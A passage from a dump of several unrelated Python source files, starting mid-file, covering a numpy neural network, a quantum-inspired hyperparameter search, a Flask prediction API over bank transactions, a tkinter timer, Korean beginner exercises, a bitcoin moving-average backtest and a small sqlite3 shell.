hidden_layer_fullDS])\n\noutput_layer = np.matmul(hidden_layer_fullDS,np.transpose(w))\n#print(\"output_layer=\",output_layer)\n\nobj=np.sum(np.square(output_layer-trainlabels))\n#print(\"obj=\",obj)\n\n\nbest_w = np.random.rand(hidden_nodes)\nbest_W = np.random.rand(hidden_nodes, cols)\nbestobj = 100000\n\n#gradient descent begin\nstop=0\n#stop = 0.000001\n\nwhile(k < epochs):\n #prevobj = obj\n \n #print(hidden_layer[0,:].shape,w.shape)\n mini_batch_array = np.random.randint(0,train.shape[0],mini_batch_size)\n w = best_w\n W = best_W\n dellw = 0\n for j in range(0,mini_batch_size):\n dellw += (np.dot(hidden_layer[mini_batch_array[j],:],np.transpose(w))-trainlabels[mini_batch_array[j]])*hidden_layer[mini_batch_array[j],:]\n\n w = w - eta*dellw\n\n #dellW=np.zeros(shape=(rows,hidden_nodes))\n for i in range(hidden_nodes):\n dell=0\n for j in range(0,mini_batch_size):\n \n dell += np.sum(np.dot(hidden_layer[mini_batch_array[j],:],w)-trainlabels[mini_batch_array[j]])*w[i] * (hidden_layer[mini_batch_array[j],i])*(1-hidden_layer[mini_batch_array[j],i])*train[mini_batch_array[j]] \n # dellW[i] = dell\n W[i] = W[i]-eta*dell\n\n \n hidden_layer = np.matmul(train,np.transpose(W))\n \n hidden_layer = np.array([sigmoid(xi) for xi in hidden_layer])\n\n output_layer = (np.matmul(hidden_layer,np.transpose(w)))\n \n obj = np.sum(np.square(output_layer - trainlabels))\n if(obj < bestobj):\n bestobj = obj\n best_w = w\n best_W = W\n\n k= k+1\n #print(k, bestobj)\n\npredict_hidden_node = sigmoid(np.matmul(test,np.transpose(best_W)))\npredictions = np.sign(np.matmul(predict_hidden_node,np.transpose(best_w)))\n\nprint(predictions)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"single_layer_nn_SGD.py","file_name":"single_layer_nn_SGD.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"359788586","text":"import random\n\nfrom keras.datasets import cifar10, cifar100\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import EarlyStopping\n\nimport math\nimport numpy as np\n\n\n'''\nContains functions of Network inspired by the concepts of Quantum Mechanics:\n\tInitializes the network class without any hyper-parameter set\n\tOrthonormal basis states defining quantum states\n\tHadamard Gate for creation of super-position\n\tRandomize the values in Bloch Sphere\n\tGet the Quantum Population Vector\n\tMake the Qunatum Measurement\n\tInitializes network with randomly selected hyper-parameter\n'''\n\nclass qgaNetwork():\n\n\t'''\n Initializes the network class\n and it's features - number of networks, param, network, quantum population vectors and array size\n without any hyper-parameter set (param is set to none)\n '''\n\tdef __init__(self, numNetworks, numParam, param=None):\n\t\tself.numNetworks = numNetworks\n\t\tself.param = param\n\t\tself.network = {}\n\t\tself.numParam = numParam # num of parameters to optimize\n\t\tself.top_bottom = 3 # Array to get Quantum population vector\n\t\tself.qpv = np.empty([self.numNetworks, self.numParam, self.top_bottom])\n\t\tself.nqpv = np.empty([self.numNetworks, self.numParam, self.top_bottom])\n\n\n\t'''\n\tOrthonormal basis states or basis vectors - ket zero and ket one\n\tthe quantum state of a qubit can be represented as a linear superposition of its two basis vector states\n\n\tQubit zero => ket zero\n\t|0> = [1, 0]\n\n\tQubit one => ket one\n\t|1> = [0, 1]\n\t'''\n\tdef basisVectors(self):\n\t\tketZero = np.array([[1], [0]])\n\t\tketOne = np.array([[0], [1]])\n\t\treturn ketZero, ketOne\n\n\n\n\t'''\n\tHADAMARD GATE\n\t\ttakes in ket zero (|0>) or ket one (|1>) \n\t\tand gives ( |0> +/- |1> )/root(2)\n\t\tthereby creating superposition, that the output can take any value between 0/1 \n\t'''\n\tdef HadamardGate(self):\n\t\t# Hadamard gate\n\t\tr2=math.sqrt(2.0) \n\t\th=np.array([[1/r2, 1/r2],[1/r2,-1/r2]])\n\t\treturn h\n\n\n\n\t'''\n\tGet random theta value in the Bloch Sphere\n\t\treturns random theta in the Bloch sphere\n\t'''\n\tdef getRandomTheta(self):\n\t\ttheta = np.random.uniform(0,1)*90\n\t\ttheta = math.radians(theta)\n\t\ttheta = float(theta)\n\t\treturn theta\n\n\n\t'''\n\tGet the angles with which the basis vectors are to be rotated\n\tUses randomly generated theta\n\treturns the rotation angles \n\t'''\n\tdef getRotationAngles(self, theta):\n\t\ttheta = float(theta)\n\t\trot1=float(math.cos(theta)); rot2=-float(math.sin(theta));\n\t\trot3=float(math.sin(theta)); rot4=float(math.cos(theta));\n\t\treturn rot1, rot2, rot3, rot4\n\n\n\t'''\n\tGet the Quantum Population Vector\n\tHas the probabilistic details of all the networks and possibility of the hyper-parameters\n\t'''\n\tdef getPopulationVector(self, AlphaBeta, ketZero, ketOne, h, theta, rot):\n\n\t\t# Values for all the networks\n\t\tfor i in range(0, self.numNetworks):\n\n\t\t\t# Values for all the parameters in the network\n\t\t\tfor j in range(0, self.numParam):\n\n\t\t\t\t# Random rotation\n\t\t\t\ttheta = self.getRandomTheta()\n\t\t\t\trot1, rot2, rot3, rot4 = (self.getRotationAngles(theta))\n\t\t\t\tAlphaBeta[0] = rot1 * (h[0][0] * ketZero[0]) + rot2 * (h[0][1] * ketZero[1])\n\t\t\t\tAlphaBeta[1] = rot3 * (h[1][0] * ketOne[0]) + rot4 * (h[1][1] * ketOne[1])\n\n\t\t\t\t# Probability of getting 0\n\t\t\t\t# alpha squared\n\t\t\t\tself.qpv[i, j, 0] = np.around(2 * pow(AlphaBeta[0], 2), 2)\n\n\t\t\t\t# Probability of getting 1\n\t\t\t\t# beta squared\n\t\t\t\tself.qpv[i, j, 1] = 1 - self.qpv[i, j, 0]\n\n\t\t# Return Quantum Population Vector\n\t\treturn self.qpv\n\n\n\t'''\n\tMake the Measurement\n\t\tAny quantum state can be represented as a superposition of the eigenstates of an observable\n\t\tMeasurement results in the system being in the eigenstate corresponding to the eigenvalue result of the measurement\n\tEvery key of the parameters in hyper-parameter set is given a range\n\tIf there are 5 keys, the keys will have ranges: (0,0.2), (0.2+, 0.4), (0.4+, 0.6), (0.6+, 0.8), (0.8+, 1)\n\tA random real number is generated\n\tBased on it's proximity with the key's range, the keys are selected, and\n\tmeasurement is said to be done\n\t'''\n\tdef Measure(self, pv):\n\n\t\t# Re-Initialize the network\n\t\tself.network = {}\n\n\t\t# For all the networks\n\t\tfor i in range(self.numNetworks):\n\n\t\t\t# Initialize the network\n\t\t\tself.network[i] = {}\n\n\t\t\t# For all the keys of the parameters\n\t\t\tp = 0\n\t\t\tfor key in self.param:\n\n\t\t\t\t# get number of options in each parameter =>numParamLen\n\t\t\t\tnumParamLen = (len(self.param[key]))\n\n\t\t\t\t# Get a random value\n\t\t\t\trand = random.randint(0, 1)\n\n\t\t\t\tval = pv[i, p, rand]\n\n\t\t\t\t# For all the keys in parameters\n\t\t\t\tfor n in range(numParamLen):\n\t\t\t\t\tcomp1 = n / float(numParamLen)\n\t\t\t\t\tcomp2 = (n + 1) / float(numParamLen)\n\n\t\t\t\t\tif ((val >= comp1) & (val <= comp2)):\n\t\t\t\t\t\tself.network[i][key] = self.param[key][n+1]\n\t\t\t\tp=p+1\n\n\t\t# Return the network\n\t\treturn self.network\n\n\n\n\n\t'''\n Initializes network with randomly selected hyper-parameter\n Returns the network\n '''\n\tdef Init_population(self):\n\n\t\t# Get |0> and |1>\n\t\tketZero, ketOne = self.basisVectors()\n\n\t\t# Create an empty numpy array for the probability of 0/1 values\n\t\tAlphaBeta = np.empty([self.top_bottom])\n\n\t\t# Get Hadamard Gate operator\n\t\th = self.HadamardGate()\n\t\t\n\t\t# Rotation Q-gate\n\t\ttheta = 0\n\t\trot = np.empty([2,2])\n\n\t\t# Initial population array (individual x chromosome)\n\t\ti=0; j=0;\n\n\t\tself.qpv = self.getPopulationVector(AlphaBeta, ketZero, ketOne, h, theta, rot)\n\n\t\tself.network = self.Measure(self.qpv)\n\n\t\treturn self.qpv, self.network\n\n\n\n\n\n'''\nClass to get the accuracy of the networks\n'''\n\nearlyStopper = EarlyStopping( monitor='val_loss', min_delta=0.1, patience=5, verbose=0, mode='auto' )\n\n\nclass fitness():\n\t'''\n Initializes the fitness class\n and it's features - fitness, number of networks\n without any hyper-parameter set (param is set to none)\n '''\n\n\tdef __init__(self, numNetworks):\n\t\tself.numNetworks = numNetworks\n\t\tself.network = {}\n\t\tself.fitness = np.empty([self.numNetworks])\n\n\n\t'''\n Get number of classification classes in the dataset\n '''\n\tdef getnbClasses(self, dataset):\n\t\tif dataset == 'cifar10':\n\t\t\tnbClasses = 10\n\t\telif dataset == 'cifar100':\n\t\t\tnbClasses = 100\n\t\treturn nbClasses\n\n\n\n\n\t'''\n Get the details of the training and test dataset\t\n '''\n\tdef getData(self, dataset, nbClasses):\n\t\tif dataset == 'cifar10':\n\t\t\t(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\t\telif dataset == 'cifar100':\n\t\t\t(x_train, y_train), (x_test, y_test) = cifar100.load_data()\n\n\t\tx_train = x_train.reshape(50000, 3072)\n\t\tx_test = x_test.reshape(10000, 3072)\n\t\tx_train = x_train.astype('float32')\n\t\tx_test = x_test.astype('float32')\n\t\tx_train /= 255\n\t\tx_test /= 255\n\t\ty_train = to_categorical(y_train, nbClasses)\n\t\ty_test = to_categorical(y_test, nbClasses)\n\n\t\treturn x_train, y_train, x_test, y_test\n\n\n\n\n\t'''\n Train the dataset\n Returns the accuracy\n '''\n\tdef getFitness(self, net, genNum, dataset):\n\t\tself.fitness = {}\n\t\tself.network = {}\n\t\tself.network = net\n\n\t\ti = 0;\t\tj = 0;\n\n\t\t# set fitness for all the networks = 0\n\t\tfor i in range(0, self.numNetworks):\n\t\t\tself.fitness[i] = 0\n\n\n\t\t# evaluate fitness of all the networks\n\t\tfor i in range(self.numNetworks):\n\n\t\t\tbatchSize = 64\n\t\t\tinput_shape = (3072,)\n\n\t\t\t# Get number of classification classes\n\t\t\tnbClasses = self.getnbClasses(dataset)\n\n\t\t\t# Fetch details of the dataset\n\t\t\tx_train, y_train, x_test, y_test = self.getData(dataset, nbClasses)\n\n\n\t\t\t# Get details of the neural network to be designed\n\t\t\tactivation = self.network[i]['activation']\n\t\t\toptimizer = self.network[i]['optimizer']\n\t\t\tnbNeurons = self.network[i]['nbNeurons']\n\t\t\tnbLayers = self.network[i]['nbLayers']\n\t\t\tdropout = self.network[i]['dropout']\n\n\t\t\t# Initializes the model type to be trained\n\t\t\tmodel = Sequential()\n\n\t\t\t# Create the neural network\n\t\t\t# Add the layers in the neural network\n\t\t\tfor j in range(nbLayers):\n\t\t\t\tif j == 0:\n\t\t\t\t\tmodel.add(Dense(nbNeurons, activation=activation, input_shape=input_shape))\n\t\t\t\telse:\n\t\t\t\t\tmodel.add(Dense(nbNeurons, activation=activation))\n\t\t\t\tmodel.add(Dropout(dropout))\n\t\t\tmodel.add(Dense(nbClasses, activation='softmax'))\n\n\t\t\t# Compile the model\n\t\t\tmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n\t\t\t# Fit the model\n\t\t\tmodel.fit(x_train, y_train, batch_size=batchSize, epochs=1, verbose=0, validation_data=(x_test, y_test),\n\t\t\t\t\t callbacks=[earlyStopper])\n\n\t\t\t# Get the fitness of the model\n\t\t\t# Accuracy and Error\n\t\t\ty = model.evaluate(x_test, y_test, verbose=0)\n\n\t\t\tself.fitness[i] = y[1] * 100\n\n\n\t\t# Return the accuracy\n\n\t\treturn self.fitness\n\n\n\n\nclass compare():\n\t'''\n Initializes the fitness comparison class\n '''\n\n\tdef __init__(self, networkFitness):\n\t\tself.networkFitness = networkFitness\n\n\n\tdef networkData(self, numNetworks, fitnessParent, fitnessChild, QnetC, QnetP):\n\n\t\tfor n in range(numNetworks):\n\t\t\tif (self.networkFitness[n] < fitnessParent[n]) or (self.networkFitness[n] < fitnessChild[n]):\n\t\t\t\tif fitnessParent[n] > fitnessChild[n]:\n\t\t\t\t\tself.networkFitness[n] = fitnessParent[n]\n\t\t\t\telse:\n\t\t\t\t\tself.networkFitness[n] = fitnessChild[n]\n\t\t\t\t\tQnetP[n] = QnetC[n]\n\n\t\treturn self.networkFitness, QnetP\n\n\n\n\tdef BestAndPoorest(self):\n\n\t\tmaxIndex = max(self.networkFitness, key=self.networkFitness.get)\n\t\tminIndex = min(self.networkFitness, key=self.networkFitness.get)\n\n\t\treturn maxIndex, minIndex\n\n\n\t'''\n\tTo get the best fitness of the generation\t\n\tReturns the best fitness of the generation and the data\n\t'''\n\tdef genFitness(self, numNetworks, numParam, param, QnetParent):\n\n\t\t# Get the generation best fitness, if it's better then proceed\n\t\tmaxIndex, minIndex = self.BestAndPoorest()\n\n\n\t\t# The network with the worst fitness is deleted and reinitialized looking for better possibilities\n\t\t# The vector and the measured values for the network with minimum fitness are:\n\t\tcv, QnetNew = qgaNetwork(numNetworks, numParam, param).Init_population()\n\n\t\tQnetParent[minIndex] = QnetNew[minIndex]\n\n\t\treturn self.networkFitness[maxIndex], QnetParent\n\n","sub_path":"QEETO/Sequential/tenNetworks/qNetwork.py","file_name":"qNetwork.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"442048144","text":"import numpy as np\r\nimport pyodbc\r\nimport pandas as pd\r\n\r\nfrom sklearn.preprocessing import Imputer, FunctionTransformer\r\n\r\n#How to install xgboost 64bit - https://stackoverflow.com/a/45016496 , !pip install C:\\xgboost-0.6-cp36-cp36m-win_amd64.whl\r\n\r\n\r\nfrom flask import Flask\r\nfrom flask_restful import reqparse, abort, Api, Resource\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n\r\n\r\npd.set_option('display.max_columns', None)\r\npd.options.display.float_format = '{:.2f}'.format\r\n\r\n# for seaborn issue:\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nserver = 'xxxx'\r\ndatabase = 'LAB'\r\nuser = 'ploy'\r\npassword = '1234'\r\ncon = pyodbc.connect('DRIVER={SQL Server};SERVER=' + server + ';DATABASE=' + database + '; UID=' + user + '; PWD=' + password + '')\r\n\r\n#######\r\nimport tensorflow as tf\r\nimport numpy as np\r\n# import matplotlib.pyplot as plt\r\nimport src.scanner as scanner\r\nimport os\r\nimport csv\r\nimport src.util as util\r\nfrom datetime import datetime\r\nfrom operator import itemgetter\r\n\r\ndef normalize_account(account, bin_sizes):\r\n out = np.zeros((np.sum(bin_sizes)), dtype=np.float32)\r\n out[0] = util.normalize(account[0], open_stat)\r\n out[1 + account[1]] = 1\r\n out[1 + bin_sizes[1]] = util.normalize(account[2], recent_stat)\r\n out[2 + bin_sizes[1]] = util.normalize(account[3], dormant_stat)\r\n out[3 + bin_sizes[1] + account[4]] = 1\r\n\r\n return out\r\n\r\n\r\ndef normalize_transactions(trans):\r\n #print (trans)\r\n for i in range(len(trans)):\r\n trans[i][0] = util.normalize(trans[i][0], amount_stat)\r\n trans[i][1] = util.normalize(trans[i][1], date_stat)\r\n\r\n return trans\r\n\r\n\r\ndef batch_to_one_hot(array_like, bin_sizes):\r\n #print (\"array_like: \", array_like, \"-bin_sizes \", bin_sizes, \"-\\n\")\r\n out = np.zeros((len(array_like), np.sum(bin_sizes)), dtype=np.float32)\r\n for i in range(len(array_like)):\r\n last = 0\r\n for j in range(len(bin_sizes)):\r\n next_ = (last + bin_sizes[j])\r\n out[i, last:next_] = util.to_one_hot(array_like[i][j], bin_sizes[j])\r\n last = next_\r\n return out\r\n\r\n\r\ndef prep_data(tuples):\r\n #profiles = []\r\n trans = []\r\n labels = []\r\n\r\n for tuple in tuples:\r\n #profiles.append(normalize_account(tuple[0], [1, len(customer_types), 1, 1, len(units)]))\r\n trans.append(batch_to_one_hot(normalize_transactions(tuple[0]), [1, 1, len(operation_types)]))\r\n labels.append(1.0 if tuple[1] else 0)\r\n\r\n return (np.stack(trans), np.stack(labels))\r\n\r\ndef sort_transaction(transactions):\r\n return sorted(transactions, key=itemgetter(1))\r\n\r\n\r\ndef sequence_summarize(sorted_transactions):\r\n out = []\r\n temp = [0, 0, 0]\r\n for t in sorted_transactions:\r\n if t[1] == temp[1] and t[2] == temp[2]:\r\n temp[0] = temp[0] + t[0]\r\n else:\r\n out.append(temp)\r\n temp = [t[0], t[1], t[2]]\r\n out.append(temp)\r\n return out[1:]\r\n\r\nstime = datetime.utcfromtimestamp(0)\r\ndir_path = os.getcwd()\r\n\r\ncustomer_types = []\r\nunits = []\r\noperation_types = []\r\n\r\n\r\nopen_stat = util.get_start_stat()\r\nrecent_stat = util.get_start_stat()\r\ndormant_stat = util.get_start_stat()\r\n# freq_stat = util.get_start_stat()\r\n# interest_stat = util.get_start_stat()\r\n\r\namount_stat = util.get_start_stat()\r\ndate_stat = util.get_start_stat()\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom numpy import array\r\ndef lblEn (x):\r\n data = x\r\n values = array(data)\r\n label_encoder = LabelEncoder()\r\n integer_encoded = label_encoder.fit_transform(values)\r\n #print(label_encoder.classes_)\r\n #print(label_encoder.inverse_transform(label_encoder.classes_))\r\n #print (\"values: \", values)\r\n #print (\"encode: \", integer_encoded)\r\n return integer_encoded \r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\ndef stdScal (x):\r\n x = StandardScaler().fit_transform(x.reshape(-1, 1))\r\n return x\r\n\r\n\r\nfrom keras.preprocessing.sequence import pad_sequences\r\ndef seq_pad(x):\r\n padded = pad_sequences(x, dtype=float, padding='pre', maxlen=20)\r\n return padded\r\n\r\n####### Transform Data ######\r\ndef transformData(InquiryLogID):\r\n sql = \" SELECT * FROM InquiryLogStatement where InquiryLogID = '\" + str(InquiryLogID) + \"'\"\r\n df_main2 = pd.read_sql(sql, con)\r\n df_main2['TransactionDate'] = pd.to_datetime(df_main2['TransactionDate'], format='%d/%m/%Y %H:%M:%S')\r\n temp = pd.DataFrame({\r\n 'InquiryLogID': df_main2['InquiryLogID'],\r\n 'TransactionDate': df_main2['TransactionDate'],\r\n 'Withdrawal': df_main2['Withdrawal'],\r\n 'Deposit': df_main2['Deposit'],\r\n })\r\n\r\n temp['txn_type'] = temp['InquiryLogID']\r\n temp.fillna(0, inplace=True)\r\n temp['txn_type'] = temp['Withdrawal'].apply(lambda x: \"CR\" if x == 0 else \"DR\")\r\n\r\n temp['Amount'] = temp['Deposit']\r\n temp['Amount'] = None\r\n temp['Amount'] = temp.apply(lambda x: x['Deposit'] if x['Withdrawal'] == 0 else x['Withdrawal'], axis=1)\r\n temp['Amount'] = abs(temp['Amount'].apply(lambda x: str(x).replace(',', '')).astype(float))\r\n\r\n\r\n df_tran = temp = pd.DataFrame({\r\n 'account_no': temp['InquiryLogID'],\r\n 'from_to_account_no': 0,\r\n 'txn_amount': temp['Amount'],\r\n 'txn_dt': temp['TransactionDate'],\r\n 'txn_hour': 0,\r\n 'txn_type': temp['txn_type'],\r\n })\r\n \r\n a = df_tran['txn_dt']\r\n a = a.apply(lambda x: x.strftime('%Y-%m-%d %H:%M:%S'))\r\n \r\n from datetime import datetime\r\n stime = datetime.utcfromtimestamp(0)\r\n df_tran['txn_dt'] = a.apply(lambda y: (datetime.strptime(y, '%Y-%m-%d %H:%M:%S') - stime).total_seconds())\r\n\r\n df_tran['txn_type'] = lblEn(df_tran['txn_type'])\r\n \r\n df_tran['txn_amount'] = stdScal(df_tran['txn_amount'])\r\n df_tran['txn_dt'] = stdScal(df_tran['txn_dt'])\r\n #print(df_tran)\r\n account_transactions = {}\r\n #print(\"reading transaction file...\")\r\n arr_main = []\r\n for index, row in df_tran.iterrows():\r\n transaction = []\r\n # transaction.append(row[0]) # account id\r\n transaction.append(util.collect_statistics(amount_stat, row[2])) #amount\r\n transaction.append(util.collect_statistics(date_stat,(row[3])))\r\n transaction.append(util.check_and_update_list(operation_types, row[5])) # type\r\n \r\n if row[0] in account_transactions:\r\n account_transactions[row[0]].append(transaction)\r\n else:\r\n account_transactions[row[0]] = [transaction]\r\n\r\n #print(account_transactions, \"\\n\")\r\n transactions = sequence_summarize(sort_transaction(account_transactions[str(InquiryLogID)]))\r\n arr_main.append(transactions)\r\n #print(\"----------\\n\", arr_main, \"\\n--------\")\r\n #print(\"**\")\r\n \r\n \r\n dataset = seq_pad(arr_main)\r\n #dataset.shape\r\n return dataset\r\n\r\n\r\n#################### API ########################\r\n\r\n# MLP for Pima Indians Dataset Serialize to JSON and HDF5\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.models import model_from_json\r\n\r\nclass Noms(Resource):\r\n def post(self):\r\n parser = reqparse.RequestParser()\r\n parser.add_argument('id',type=int)\r\n args = parser.parse_args()\r\n \r\n id = args['id']\r\n data = searchById(id)\r\n\r\n # load json and create model\r\n json_file = open('nominee_model.json', 'r')\r\n loaded_model_json = json_file.read()\r\n json_file.close()\r\n loaded_model = model_from_json(loaded_model_json)\r\n \r\n # load weights into new model\r\n loaded_model.load_weights(\"nominee_model.h5\")\r\n predict = loaded_model.predict_classes(data)\r\n return str(predict)\r\n\r\n \r\n \r\ndef searchById(id):\r\n id = int(id)\r\n dataset = transformData(id)\r\n print(dataset)\r\n return dataset\r\n \r\n \r\n\r\napi.add_resource(Noms, '/noms')\r\n\r\n\r\n\r\n##\r\n## Actually setup the Api resource routing here\r\n##\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","sub_path":"Install/nomiee_acc_model_api.py","file_name":"nomiee_acc_model_api.py","file_ext":"py","file_size_in_byte":7959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"238732986","text":"import tkinter as tk\n\n\nclass StepTimer:\n \"\"\" Main view constructor\n view - main view object\n \"\"\"\n def __init__(self, main_view, update_freq=100):\n self.started = False\n self.update_freq = update_freq\n self.main_view = main_view\n\n self.timer = tk.Scale(\n self.main_view,\n from_=10,\n to=500,\n orient=tk.HORIZONTAL,\n length=self.main_view.game_manager.grid_length,\n showvalue=False,\n command=self.update_freq_changed\n )\n self.timer.set(update_freq)\n self.timer.grid(row=2, column=0, columnspan=5)\n\n \"\"\" Start timer \"\"\"\n def start(self):\n self.started = True\n self.main_view.button_manager.buttons['play'].config(state=tk.DISABLED)\n self.main_view.button_manager.buttons['stop'].config(state=tk.ACTIVE)\n self.main_view.button_manager.buttons['next'].config(state=tk.DISABLED)\n self.main_view.button_manager.buttons['generate'].config(state=tk.DISABLED)\n self.main_view.button_manager.buttons['reset'].config(state=tk.DISABLED)\n\n self.main_view.after(self.update_freq, self.update)\n\n \"\"\" Update timer \"\"\"\n def update(self):\n self.main_view.button_manager.buttons['play'].config(state=tk.ACTIVE)\n self.main_view.button_manager.buttons['stop'].config(state=tk.DISABLED)\n self.main_view.button_manager.buttons['next'].config(state=tk.ACTIVE)\n self.main_view.button_manager.buttons['generate'].config(state=tk.ACTIVE)\n self.main_view.button_manager.buttons['reset'].config(state=tk.ACTIVE)\n\n self.main_view.game_manager.next_generation()\n self.main_view.square_manager.update_squares()\n\n if self.started:\n self.start()\n\n \"\"\" Stop timer \"\"\"\n def stop(self):\n self.started = False\n\n def update_freq_changed(self, value):\n self.update_freq = value\n","sub_path":"view/step_timer.py","file_name":"step_timer.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"136403047","text":"#111\na = input('알파벳을 1개 입력하시오:', )\nif a.islower() == 1:\n print(a.upper())\nelse:\n print(a.lower())\n\n#112\nb = int(input('score:', ))\nif 80 < b <= 100:\n print('grade is A')\nelif 60 < b < 81:\n print('grade is B')\nelif 40 < b < 61:\n print('grade is C')\nelif 20 < b < 41:\n print('grade is D')\nelif 0 <= b < 21:\n print('grade is E')\nelse:\n print('100점이 만점이다 ㅡㅡ')\n\n#113\nc = input('입력:').split()\namount = c[0]\ncurrency = c[1]\n\nif currency == '달러':\n rate = 1167\nelif currency == '엔':\n rate = 1.096\nelif currency == '유로':\n rate = 1268\nelif currency == '위안':\n rate = 171\nprint(float(rate)*float(amount), '원')\n\n#114\nd1 = int(input('input number1:'))\nd2 = int(input('input number2:'))\nd3 = int(input('input number3:'))\nprint(max(d1, d2, d3))\n\n#115\ne = input('휴대전화 번호 입력:').split('-')\nif e[0] == '011':\n f = 'SKT'\n print('당신은', f, '사용자입니다.')\nelif e[0] == '016':\n f = 'KT'\n print('당신은', f, '사용자입니다.')\nelif e[0] == '019':\n f = 'LGU'\n print('당신은', f, '사용자입니다.')\nelif e[0] == '010':\n f = '알수없는'\n print('당신은', f, '사용자입니다.')\n\n#116\ng = input('우편번호 5자리 입력:')\nif g[2] in '012':\n print('강북구')\nelif g[2] in '345':\n print('도봉구')\nelse:\n print('노원구')\n\n#117\nh = input('주민등록번호:')\nif h[7] in '13':\n print('남자')\nelif h[7] in '24':\n print('여자')\n\n#118\ni = input('주민등록번호:')\nif int(i[8:10]) <= 8:\n print('서울입니다.')\nelse:\n print('서울이 아닙니다.')\n\n#119\nj = input('주민등록번호: ')\nsum = int(j[0])*2 + int(j[1])*3 + int(j[2])*4 + int(j[3])*5 + int(j[4])*6 + int(j[5])*7 + int(j[7])*8 + int(j[8])*9 + int(j[9])*2 + int(j[10])*3 + int(j[11])*4 + int(j[12])*5\none = sum % 11\ntwo = 11 - one\nif two == int(j[13]):\n print('유효한 주민등록번호입니다.')\nelse:\n print('유효하지 않은 주민등록번호입니다.')\n","sub_path":"기본 300 예제/#111~#119.py","file_name":"#111~#119.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"342593574","text":"from datetime import date, datetime, timedelta\nfrom rates_data_manager import get_and_manage_rates_data\nimport matplotlib.pyplot as plt\nfrom rates_data_processing import *\n\ndate_start = date(2019, 1, 1)\ndate_end = date(2020, 7, 1)\n# date_end = date.today()-timedelta(1)\nassets = \"BTC/EUR\"\n\nrates = get_and_manage_rates_data(assets, date_start, date_end)\nprint(\"nb rates:\", len(rates))\n\nma_intervals = [10, 50]\nma_list = []\n\nfor interval in ma_intervals:\n ma = compute_moving_average_for_rates_data(rates, interval)\n ma_list.append((ma, interval))\n\nbuy_and_sell_points = compute_buy_and_sell_points_from_ma(ma_list[0][0], ma_list[1][0], 1)\n\n\ninitial_wallet = 1000\nfinal_wallet = compute_buy_and_sell_gains(initial_wallet, rates, buy_and_sell_points)\n# Afficher date debut/fin\n# Afficher le portefeuille debut / fin\nprint(\"Date de début:\", date_start)\nprint(\"Date de fin:\", date_end)\nprint(\"Portefeuille de début:\", initial_wallet)\nprint(\"Portefeuille de fin:\", round(final_wallet))\n\n\n\n# [(..adverages.., interval), (..adverages.., interval), (..adverages.., interval)]\n# ma20 = compute_moving_average_for_rates_data(rates, 20)\n# ma100 = compute_moving_average_for_rates_data(rates, 100)\n\n# rates <- date / value\n'''\nrates_dates = [datetime.strptime(r[\"date\"], \"%Y-%m-%d\") for r in rates]\nrates_values = [r[\"value\"] for r in rates]\nplt.ylabel(assets)\nplt.plot(rates_dates, rates_values) # <--- valeurs\n\nfor ma_item in ma_list:\n ma_values = [r[\"value\"] for r in ma_item[0]]\n plt.plot(rates_dates, ma_values, label=\"MA\" + str(ma_item[1]))\n\n# r y\n# plt.axvline(x=date(2020, 5, 1), color='y')\n# buy_and_sell_points\n# [0] date_str\n# [1] true/false\n# plt.axvline(x=date(2020, 5, 1), color='y')\nfor point in buy_and_sell_points:\n date_obj = datetime.strptime(point[0], \"%Y-%m-%d\")\n plt.axvline(x=date_obj, color='r' if point[1] else 'y')\n\nplt.legend()\nplt.show()\n\n'''","sub_path":"bitcoin_analyser_v3_ressources/1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"216574998","text":"# Jordan Kadish\n# 27/10/2017\n# sqlite python database creation script\nimport sqlite3 as db\n\ndbName = input(\"enter a database name (\\\"test.db\\\")\\n\")\ntry:\n # connect to an existing database\n # or create a new one with the name taken from input\n connect = db.connect(dbName)\n cursor = connect.cursor()\nexcept Exception as e:\n print(e)\n\ncommand = input(\"Enter SQL commands, or type \\\"end\\\" to exit\\n\")\nwhile not (command == \"end\"):\n try:\n cursor.execute(command)\n response = cursor.fetchall()\n for row in response:\n print(row)\n except Exception as e:\n print(e)\n command = input()\n","sub_path":"sqlite3prog.py","file_name":"sqlite3prog.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"532498953","text":"name = \"ptex\"\n\nversion = \"2.1.28\"\n\nauthors = [\n 'Walt Disney Animation Studios'\n]\n\ndescription = \\\n '''\n Per-Face Texture Mapping for Production Rendering.\n '''\n\nbuild_requires = [\n 'gcc-4.8.2+'\n]\n\nvariants = [\n [\"platform-linux\", \"arch-x86_64\", \"os-CentOS-7\"]\n]\n\nuuid = \"ptex\"\n\ndef commands():\n env.PATH.append(\"{root}/bin\")\n env.LD_LIBRARY_PATH.append('{root}/lib64')\n\n if building:\n env.CPATH.append('{root}/include')\n env.LIBRARY_PATH.append('{root}/lib64')\n\n","sub_path":"ptex/2.1.28/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"466686774","text":"from time import sleep\nimport unittest\nfrom nose.plugins.attrib import attr\nfrom framework.base_test import setup_driver, teardown_driver\nfrom 